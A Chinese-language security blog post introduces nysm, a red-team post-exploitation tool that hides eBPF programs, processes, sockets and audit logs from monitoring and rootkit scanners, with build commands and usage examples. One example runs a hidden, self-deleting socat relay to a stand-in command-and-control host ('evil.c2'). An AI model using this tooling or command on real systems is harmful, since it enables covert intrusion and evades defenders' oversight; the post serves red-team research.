nysm:一款针对红队审计的隐蔽型后渗透安全测试容器

2024-03-26 972 0

关于nysm

nysm是一款针对红队审计的隐蔽型后渗透安全测试容器,该工具主要针对的是eBPF,能够帮助广大红队研究人员在后渗透测试场景下保持eBPF的隐蔽性。

功能特性

随着基于eBPF的安全工具越来越受社区欢迎,nysm也应运而生。该工具能保持各种安全测试工具的隐蔽性,当前版本的nysm支持隐藏下列内容:

1、新的eBPF程序;

2、新的eBPF Map;

3、新的eBPF链接;

4、新的审计生成日志;

5、新的进程PID;

6、新的会话套接字;

除了隐藏eBPF之外,当前版本的nysm还支持隐藏下列工具组件:

bpftool

bpflist-bpfcc

ps

top

sockstat

ss

rkhunter

chkrootkit

lsof

auditd

...

工具安装

源码获取:

广大研究人员可以直接使用下列命令将该项目源码克隆至本地:

git clone https://github.com/eeriedusk/nysm.git

工具依赖组件安装:

sudo apt install git make pkg-config libelf-dev clang llvm bpftool -y

Linux Header配置:

cd ./nysm/src/

bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h

代码构建:

cd ./nysm/src/

make

工具使用

nysm的使用非常简单,并提供了下列参数命令:

Usage: nysm [OPTION...] COMMAND

Stealth eBPF container.

 

  -d, --detach               在后台运行命令

  -r, --rm                   执行后执行自毁程序

  -v, --verbose              生成Verbose模式输出

  -h, --help                  显示工具帮助信息

      --usage                显示工具使用提示消息

工具使用样例

运行一个隐藏的Bash:

./nysm bash

运行一个隐藏的ssh并移除./nysm:

./nysm -r ssh user@domain

以守护进程形式运行一个隐藏的socat并移除./nysm:

./nysm -dr socat TCP4-LISTEN:80 TCP4:evil.c2:443

许可证协议

本项目的开发与发布遵循Apache-2.0开源许可证协议。

项目地址

nysm:【GitHub传送门


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

如何使用CODASM编码Payload并降低熵值
SessionExec:一款针对会话安全的安全命令测试工具
Arkime:一款大规模数据包捕获和索引数据库系统
从蓝队流量角度分析Shiro-550反序列化漏洞
万字长文浅谈三高系统建设方法论和实践
你遇到过哪些奇葩面试题目;如何考察渗透测试与安全管理能力| FB甲方群话题讨论

发布评论